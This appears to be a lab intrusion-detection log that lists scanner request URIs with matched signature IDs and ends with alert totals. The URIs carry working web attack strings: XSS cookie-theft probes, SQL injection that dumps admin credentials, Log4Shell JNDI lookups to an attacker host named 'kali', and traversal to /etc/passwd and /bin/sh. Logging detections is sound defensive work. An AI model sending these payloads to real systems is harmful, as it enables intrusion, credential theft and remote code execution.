Packet [9688]	Uri [/read_body.php?mailbox=<script>alert(document.cookie)</script>&passed_id=<script>alert(document.cookie)</script>&startMessage=1&show_more=0]	Nattacks [1]	Signatures	[2009714]
Packet [9690]	Uri [/cgi-bin/read_body.php?mailbox=<script>alert(document.cookie)</script>&passed_id=<script>alert(document.cookie)</script>&startMessage=1&show_more=0]	Nattacks [1]	Signatures	[2009714]
Packet [9692]	Uri [/web/read_body.php?mailbox=<script>alert(document.cookie)</script>&passed_id=<script>alert(document.cookie)</script>&startMessage=1&show_more=0]	Nattacks [1]	Signatures	[2009714]
Packet [9696]	Uri [/web/?param=${jndi:ldap://127.0.0.1#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9734]	Uri [/web/?param=${jndi:ldap://127.0.0.1#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9737]	Uri [/tjobs/jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--]	Nattacks [5]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]
Packet [9739]	Uri [/jobs/jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--]	Nattacks [5]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]
Packet [9741]	Uri [/jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--]	Nattacks [5]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]
Packet [9743]	Uri [/cgi-bin/jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--]	Nattacks [5]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]
Packet [9745]	Uri [/web/jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--]	Nattacks [5]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]
Packet [9759]	Uri [/page.php?action=view&id=1<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9762]	Uri [/web/?param=${jndi:ldap://localhost#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9769]	Uri [/cms/system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;]	Nattacks [1]	Signatures	[2006446]
Packet [9771]	Uri [/tinxcms/system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;]	Nattacks [1]	Signatures	[2006446]
Packet [9772]	Uri [/system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;]	Nattacks [1]	Signatures	[2006446]
Packet [9773]	Uri [/cgi-bin/system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;]	Nattacks [1]	Signatures	[2006446]
Packet [9775]	Uri [/web/system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;]	Nattacks [1]	Signatures	[2006446]
Packet [9781]	Uri [/calendar_scheduler.php?start="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9783]	Uri [/cgi-bin/calendar_scheduler.php?start="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9785]	Uri [/web/calendar_scheduler.php?start="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9787]	Uri [/city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9789]	Uri [/cgi-bin/city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9790]	Uri [/web/city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9805]	Uri [/trombi/photo.php?id=-9999/**/union/**/select/**/1,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[16431]	[2006446]
Packet [9807]	Uri [/photo.php?id=-9999/**/union/**/select/**/1,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[16431]	[2006446]
Packet [9809]	Uri [/cgi-bin/photo.php?id=-9999/**/union/**/select/**/1,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[16431]	[2006446]
Packet [9811]	Uri [/web/photo.php?id=-9999/**/union/**/select/**/1,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[16431]	[2006446]
Packet [9813]	Uri [/index.php?cmd=search&keywords="><script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9814]	Uri [/web/?param=${jndi:ldap://localhost#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [9815]	Uri [/cgi-bin/index.php?cmd=search&keywords="><script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9817]	Uri [/web/index.php?cmd=search&keywords="><script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9826]	Uri [/login.php?ref='%3e%3cscript%3ealert(openvasvt136279398)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [9828]	Uri [/cgi-bin/login.php?ref='%3e%3cscript%3ealert(openvasvt136279398)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [9829]	Uri [/web/login.php?ref='%3e%3cscript%3ealert(openvasvt136279398)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [9830]	Uri [/chat/send.php?css=%3cscript%3ealert(openvasvt2006313117)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [9832]	Uri [/cgi-bin/chat/send.php?css=%3cscript%3ealert(openvasvt2006313117)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [9834]	Uri [/web/chat/send.php?css=%3cscript%3ealert(openvasvt2006313117)%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [9840]	Uri [/viewcvs.cgi/?cvsroot=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9842]	Uri [/cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9844]	Uri [/web/viewcvs.cgi/?cvsroot=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9869]	Uri [/cms/?p=<script>alert(/xss-test/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9870]	Uri [/w-cms/?p=<script>alert(/xss-test/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9872]	Uri [/w_cms/?p=<script>alert(/xss-test/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9874]	Uri [/?p=<script>alert(/xss-test/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9876]	Uri [/cgi-bin/?p=<script>alert(/xss-test/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9877]	Uri [/web/?p=<script>alert(/xss-test/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [9878]	Uri [/webatall/404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9880]	Uri [/weball/404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9882]	Uri [/404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9884]	Uri [/cgi-bin/404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9886]	Uri [/web/404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9915]	Uri [/portfolio_genre.php?id=-67%20union%20select%201,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[19438]	[2006446]
Packet [9917]	Uri [/cgi-bin/portfolio_genre.php?id=-67%20union%20select%201,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[19438]	[2006446]
Packet [9920]	Uri [/web/portfolio_genre.php?id=-67%20union%20select%201,2,0x53514c2d496e6a656374696f6e2d54657374--]	Nattacks [2]	Signatures	[19438]	[2006446]
Packet [9947]	Uri [/cart/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2013818]
Packet [9949]	Uri [/shop/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2013818]
Packet [9951]	Uri [/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2013818]
Packet [9952]	Uri [/cgi-bin/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2013818]
Packet [9953]	Uri [/web/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00]	Nattacks [1]	Signatures	[2013818]
Packet [10009]	Uri [/xenon/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374,4]	Nattacks [1]	Signatures	[2006446]
Packet [10011]	Uri [/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374,4]	Nattacks [1]	Signatures	[2006446]
Packet [10012]	Uri [/cgi-bin/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374,4]	Nattacks [1]	Signatures	[2006446]
Packet [10013]	Uri [/web/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374,4]	Nattacks [1]	Signatures	[2006446]
Packet [10058]	Uri [/bbs/check_user_id.php?user_id=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [10060]	Uri [/check_user_id.php?user_id=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [10063]	Uri [/cgi-bin/check_user_id.php?user_id=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [10066]	Uri [/web/check_user_id.php?user_id=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [10070]	Uri [/bbs/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [10072]	Uri [/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [10074]	Uri [/cgi-bin/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [10077]	Uri [/web/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [10085]	Uri [/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [10086]	Uri [/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd]	Nattacks [1]	Signatures	[58276]
Packet [10087]	Uri [/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd]	Nattacks [1]	Signatures	[58276]
Packet [10088]	Uri [/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh]	Nattacks [2]	Signatures	[58276]	[2011465]
Packet [10092]	Uri [/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [10096]	Uri [/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [10097]	Uri [/web/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [10098]	Uri [/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [1]	Signatures	[58276]
Packet [10099]	Uri [/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [2]	Signatures	[58276]	[2011465]
Packet [10101]	Uri [/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [10104]	Uri [/web/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [10107]	Uri [/a.jsp/<SCRIPT>alert(document.domain)</SCRIPT>]	Nattacks [2]	Signatures	[44531]	[2009714]
# N. packets [10492], [610] with alerts, N. Alerts [870]
# Execution time: 0.576236 s
